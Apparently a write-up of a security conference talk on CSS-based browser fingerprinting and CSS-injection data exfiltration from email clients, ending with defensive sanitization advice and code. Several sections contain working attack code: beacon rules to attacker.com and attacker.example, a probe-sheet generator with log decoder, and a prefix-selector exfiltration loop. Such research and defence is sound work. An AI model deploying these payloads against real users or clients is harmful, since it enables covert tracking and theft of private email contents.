Invisible Ink: Privacy Risks of CSS on the Web and in Emails
This talk demonstrates how CSS features can be abused for advanced browser and email client fingerprinting, bypassing traditional JavaScript-based protections. The researchers show how CSS-based techniques like media queries, container queries, and math functions can leak system information, hardware architecture, and user preferences. They also present a novel CSS injection technique, assigned CVE-2024-24510, which allows for data exfiltration from email clients. The presentation concludes with practical mitigations for developers and security professionals to prevent these privacy-invasive tracking methods.
Bypassing JavaScript Protections: Fingerprinting and Data Exfiltration via CSS
TLDR: Modern browser and email client security often relies on disabling JavaScript to prevent tracking, but this talk shows that CSS features like media queries and math functions are sufficient for sophisticated fingerprinting and data exfiltration. The researchers demonstrated how these techniques can identify hardware, OS, and user preferences, and even exfiltrate data from email clients via a novel CSS injection vulnerability. Security professionals must treat CSS as a viable attack vector for information leakage and prioritize sanitizing HTML content in email clients to mitigate these risks.
Most security professionals treat CSS as a benign styling language and focus their defensive effort on JavaScript-based threats. That assumption is dangerous. The research presented at Black Hat Asia 2025 by Leon Trampert and Daniel Weber shows how expressive CSS has become as a tool for tracking and data exfiltration. By combining features such as media queries, container queries, and math functions, an attacker can assemble a unique browser fingerprint without executing a single line of JavaScript.
The Mechanics of CSS Fingerprinting
Browser fingerprinting is usually associated with JavaScript APIs such as Canvas or WebGL. CSS offers a stealthier alternative that works even where scripts are blocked, whether by an extension such as NoScript or by an email client that never executes JavaScript in the first place. The core mechanism is conditional rendering: the browser must lay out content differently depending on the user's environment, and those decisions become observable once they are tied to network requests.
Media queries are the simplest case. An attacker injects a series of @media rules whose bodies reference an image on an attacker-controlled server, so the browser fetches that image only when the condition holds. A rule guarded by (min-width: 720px) fires only if the viewport is at least 720px wide, and one guarded by (prefers-color-scheme: dark) fires only for users who prefer a dark theme. Because each request carries its own query string, the server log records which conditions were true. A single min-width rule yields only a lower bound, so a series of thresholds (or a binary search over them) is needed to narrow the width down to a bucket. Two details matter in practice: the styled element must actually be present and rendered for the background fetch to happen, and each condition should target its own element so that distinct conditions produce distinct requests.
The research goes further with CSS math functions such as calc() and sin(). Their results can differ subtly across hardware architectures and floating-point implementations. By feeding the result of a carefully chosen calculation into something a query can test, for example the width of a box checked by a container query, an attacker turns that difference into a conditional request and leaks information about the CPU or OS.
/* Leaks a viewport lower bound: the request fires only if an element with class "fingerprint" is rendered and the viewport is at least 720px wide */
@media (min-width: 720px) {
.fingerprint {
background-image: url('https://attacker.com/log?width=720');
}
}
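The single rule above only tells the server that the viewport is at least 720px wide. The following script, an added example written for this page rather than code from the talk or its authors, generalizes it: it emits a whole probe stylesheet from a list of media-query conditions (several width thresholds plus colour scheme, motion, pointer and pixel-density preferences), the matching markup, and a decoder that turns the beacon hits found in the attacker's access log back into a fingerprint. The beacon host attacker.example, the class names and the log lines are all constructed for the example.

```javascript
// Added example (not from the talk): CSS-only fingerprinting via media
// queries. One stylesheet, one element per probe, one beacon URL per hit.
// The beacon host is an assumed placeholder.
const BEACON = 'https://attacker.example/b';

// Each probe: a media query condition and the label the server will see.
// Width probes form buckets; a 1366px viewport hits w720, w1024 and w1280
// and misses w1440, so the largest hit bounds the width from below.
const PROBES = [
  { q: '(min-width: 720px)', label: 'w720' },
  { q: '(min-width: 1024px)', label: 'w1024' },
  { q: '(min-width: 1280px)', label: 'w1280' },
  { q: '(min-width: 1440px)', label: 'w1440' },
  { q: '(prefers-color-scheme: dark)', label: 'dark' },
  { q: '(prefers-reduced-motion: reduce)', label: 'reduce-motion' },
  { q: '(hover: none)', label: 'no-hover' }, // typical of touch-only devices
  { q: '(min-resolution: 2dppx)', label: 'hidpi' },
];

// Build the stylesheet. The token ties all hits from one render together
// on the server. An element with the matching class must exist and be
// rendered, otherwise no background fetch ever fires.
function buildProbeSheet(token, probes = PROBES) {
  return probes.map(({ q, label }) =>
    `@media ${q} { .fp-${label} { background-image: url("${BEACON}?t=${token}&p=${label}"); } }`
  ).join('\n');
}

// One element per probe so that every true condition is a separate request.
function buildProbeMarkup(probes = PROBES) {
  return probes.map(({ label }) => `<div class="fp-${label}"></div>`).join('');
}

// Decode the hits for one token from access-log lines (Combined Log Format,
// constructed for this example) into the properties they imply.
function decodeHits(token, logLines) {
  const seen = new Set();
  for (const line of logLines) {
    const m = line.match(/"GET \/b\?t=([^&\s"]+)&p=([^&\s"]+)/);
    if (m && m[1] === token) seen.add(decodeURIComponent(m[2]));
  }
  const widths = [720, 1024, 1280, 1440];
  const hit = widths.filter(w => seen.has(`w${w}`));
  const minWidth = hit.length ? Math.max(...hit) : 0;
  const above = widths.find(w => w > minWidth); // first threshold that missed
  return {
    widthRange: above ? `${minWidth}-${above - 1}` : `${minWidth}+`,
    darkMode: seen.has('dark'),
    reducedMotion: seen.has('reduce-motion'),
    touchOnly: seen.has('no-hover'),
    hidpi: seen.has('hidpi'),
  };
}

// Constructed sample log: token abc123 is a 1366px-wide dark-mode HiDPI
// laptop; token zzz999 is a second visitor with a wider screen.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Apr/2025:09:12:01 +0000] "GET /b?t=abc123&p=w720 HTTP/1.1" 200 43',
  '203.0.113.7 - - [10/Apr/2025:09:12:01 +0000] "GET /b?t=abc123&p=w1024 HTTP/1.1" 200 43',
  '203.0.113.7 - - [10/Apr/2025:09:12:01 +0000] "GET /b?t=abc123&p=w1280 HTTP/1.1" 200 43',
  '203.0.113.7 - - [10/Apr/2025:09:12:01 +0000] "GET /b?t=abc123&p=dark HTTP/1.1" 200 43',
  '203.0.113.7 - - [10/Apr/2025:09:12:01 +0000] "GET /b?t=abc123&p=hidpi HTTP/1.1" 200 43',
  '198.51.100.9 - - [10/Apr/2025:09:13:44 +0000] "GET /b?t=zzz999&p=w1440 HTTP/1.1" 200 43',
];

console.log(buildProbeSheet('abc123'));
console.log(decodeHits('abc123', SAMPLE_LOG));
```

Running the script prints the eight-rule stylesheet and then the decoded fingerprint for token abc123: a width between 1280 and 1439 pixels, dark mode and HiDPI true, reduced motion and touch-only false. The same approach extends to any boolean media feature; the only requirement is that each condition maps to its own element and its own URL.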
From Fingerprinting to Data Exfiltration
Fingerprinting is a privacy concern, but the researchers also found a more serious class of bug in email clients: CSS injection. Many clients, including some operated by major providers, do not sanitize the HTML and CSS of incoming messages thoroughly enough, which lets a sender inject arbitrary styles into the rendered mailbox.
By injecting an @import rule, the researchers could make an email client load an external, attacker-served stylesheet. This finding, assigned CVE-2024-24510, let the injected CSS style elements of the client's own interface rather than just the message body. In the case of SOGo, that was enough to exfiltrate sensitive data. CSS attribute selectors such as [value^="a"] match only elements whose value attribute starts with the given string, so the attacker emits one rule per candidate character, each pointing at a distinct URL; the one rule that matches triggers a request and reveals the next character. Serving a fresh stylesheet per round extends the known prefix until a subject line or message body has been reconstructed character by character.
The email client acts as an oracle: a guess is confirmed when the corresponding rule applies and triggers a network request, and refuted when it does not. For a pentester this means that even without JavaScript execution, controlling the CSS of a rendered page or email can be enough to exfiltrate data from it.
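The character-by-character loop described above, as an added example that is not the talk's or SOGo's code: one function emits a round's stylesheet (one prefix-selector rule per candidate character), a tiny in-process stand-in for the client's style engine reports which beacon URLs that sheet would make it fetch, and a driver extends the known prefix until nothing matches. In a real attack each round is a new stylesheet pulled in via @import from the attacker's server; here the round trip is simulated locally. The target element input#subject, the host attacker.example and the secret subject line are constructed for the example.

```javascript
// Added example (not from the talk): CSS prefix-selector exfiltration with
// the email client simulated in-process. Names are placeholders.
const BEACON = 'https://attacker.example/x';
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 :-_.@';

// Escape a string for use inside a double-quoted CSS string.
function cssString(s) {
  return '"' + s.replace(/\\/g, '\\\\').replace(/"/g, '\\"') + '"';
}

// One stylesheet per round: for every candidate next character emit a rule
// that matches only when the value starts with prefix + candidate. At most
// one rule can match, so the client sends at most one beacon request.
function buildGuessSheet(prefix, alphabet = ALPHABET) {
  return [...alphabet].map(ch =>
    `input#subject[value^=${cssString(prefix + ch)}] { background-image: url("${BEACON}?p=${encodeURIComponent(prefix + ch)}"); }`
  ).join('\n');
}

// Minimal stand-in for the client's style engine: it understands only the
// rule shape produced by buildGuessSheet and returns the URLs it would fetch
// for an input whose value attribute is subjectValue.
function simulateClient(sheet, subjectValue) {
  const fetched = [];
  const rule = /input#subject\[value\^="((?:[^"\\]|\\.)*)"\] \{ background-image: url\("([^"]+)"\); \}/g;
  for (const m of sheet.matchAll(rule)) {
    const guess = m[1].replace(/\\(.)/g, '$1'); // undo cssString escaping
    if (subjectValue.startsWith(guess)) fetched.push(m[2]);
  }
  return fetched;
}

// Drive the oracle round by round. The loop stops when no candidate matches,
// which means either the end of the value or a character outside ALPHABET;
// the attacker cannot tell the two apart without widening the alphabet.
function exfiltrate(secretValue, alphabet = ALPHABET, maxLen = 64) {
  let known = '';
  let rounds = 0;
  while (known.length < maxLen) {
    rounds++;
    const hits = simulateClient(buildGuessSheet(known, alphabet), secretValue);
    if (hits.length !== 1) break;
    known = new URL(hits[0]).searchParams.get('p'); // server reads prefix back
  }
  return { recovered: known, rounds };
}

// Constructed secret: a subject line the sender could not otherwise see.
console.log(exfiltrate('Re: Invoice 4711 - wire details'));
```

Each round costs one stylesheet fetch and one beacon request, so a 31-character subject takes 32 rounds (the last one confirms the end). The alphabet limits what can be recovered: a character outside it stops the loop, which is why real payloads either use a large alphabet or fall back to substring selectors such as [value*="..."] to resume past the gap.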
Real-World Implications for Pentesters
During a red team engagement or a bug bounty hunt, you should look for entry points where user-supplied HTML is rendered without strict sanitization. This is common in webmail interfaces, customer support ticketing systems, and even some document previewers.
When testing, do not stop at XSS. Check whether you can inject CSS that triggers external requests. If you control the CSS, you can confirm when and from where a message or page was opened and identify the viewer's browser, OS, and preferences, which is invaluable for tailoring subsequent attacks. These techniques matter because traditional web application firewalls (WAFs) tuned to catch <script> tags or onerror handlers typically ignore them.
Defensive Strategies
Defending against CSS-based attacks requires a change in how user-supplied HTML is handled. The most effective mitigation is to strip every external resource load: url() references in any CSS property (backgrounds, list-style images, cursors, and @font-face sources alike), @import rules, and tags such as <iframe>. Be aware that CSS escapes can disguise these tokens (a backslash-escaped "u" followed by "rl(" still parses as url(), so sanitization must operate on parsed or fully unescaped CSS rather than on a regular-expression match over the raw text.
For email clients, the best practice is to render HTML in a sandboxed environment with no network access, or to convert it to a safe static form such as plain text or a pre-rendered image. Developers should keep their sanitization library up to date and configure it explicitly to reject the CSS injection vectors above, not just script. The OWASP HTML Sanitization guide covers best practices for handling untrusted HTML.
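To make the allowlist policy concrete, here is an added example (written for this page, not a sanitizer from the talk or any library) of the conservative rules a mail renderer can apply: <style> blocks, which carry @import, @font-face and @media, are dropped entirely, and inline style attributes keep only allowlisted properties whose values contain no parentheses, backslashes, at-signs or block terminators, so nothing that can trigger a fetch or smuggle an escaped url( survives. The property list and the sample payload are constructed for the example; a production deployment should lean on a maintained sanitizer configured to the same policy.

```javascript
// Added example (not from the talk): allowlist sanitization of the CSS
// that survives into a rendered email. Demonstrates the policy only.
const ALLOWED_PROPS = new Set([
  'color', 'background-color', 'font-size', 'font-weight', 'font-family',
  'text-align', 'text-decoration', 'margin', 'padding', 'border',
  'width', 'height', 'line-height', 'display',
]);

// Reject values containing anything that can reach the network or smuggle
// such a token past a naive filter:
//   ( ) : url(), image-set(), expression(), var() indirection, calc()
//   \   : CSS escapes such as \75 rl(  which decode to url(
//   @   : at-rules (@import) if the value is ever reflected into a sheet
//   /   : protocol-relative or scheme fragments ("//attacker")
//   ; { } < > : declaration/block/tag terminators enabling breakout
// Functional notation such as rgb() is lost too; that is the accepted cost.
const UNSAFE_VALUE = /[()\\@\/;{}<>]/;

// Sanitize the contents of one style="" attribute. Returns the surviving
// declarations joined back together, or '' if nothing survived.
function sanitizeInlineStyle(styleAttr) {
  const kept = [];
  for (const decl of styleAttr.split(';')) {
    const idx = decl.indexOf(':');
    if (idx < 0) continue;
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    if (!ALLOWED_PROPS.has(prop)) continue;                 // unknown property
    if (value === '' || UNSAFE_VALUE.test(value)) continue; // fetch-capable value
    if (/!\s*important/i.test(value)) continue;             // cannot override client UI
    kept.push(`${prop}: ${value}`);
  }
  return kept.join('; ');
}

// <style> blocks are the riskier surface (@import, @font-face, @media):
// the conservative policy is to drop them wholesale from the raw HTML.
function stripStyleBlocks(html) {
  return html.replace(/<style\b[^>]*>[\s\S]*?<\/style\s*>/gi, '');
}

// Constructed sample: a tracking payload mixed with legitimate styling,
// including an escaped url( that a plain substring check would miss.
const SAMPLE = 'color: #333; background-image: url(https://attacker.example/log?w=720); font-size: 14px; color: \\75 rl(x)';
console.log(sanitizeInlineStyle(SAMPLE));
console.log(stripStyleBlocks('<p>hi</p><style>@import url(x);</style><b>x</b>'));
```

On the sample, only "color: #333; font-size: 14px" survives: the background-image is not allowlisted, and the escaped url( is rejected by the backslash check before any decoding is attempted. Splitting on ";" before checking each declaration also means an attacker cannot hide a second, unsafe declaration inside an allowlisted one.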
The era of assuming CSS is harmless is over. As browsers and email clients continue to add complex features to support responsive design, they inadvertently expand the attack surface for privacy-invasive tracking and data theft. Start auditing your applications for these CSS-based leaks today, because the tools to exploit them are already in the hands of those who don't care about your privacy.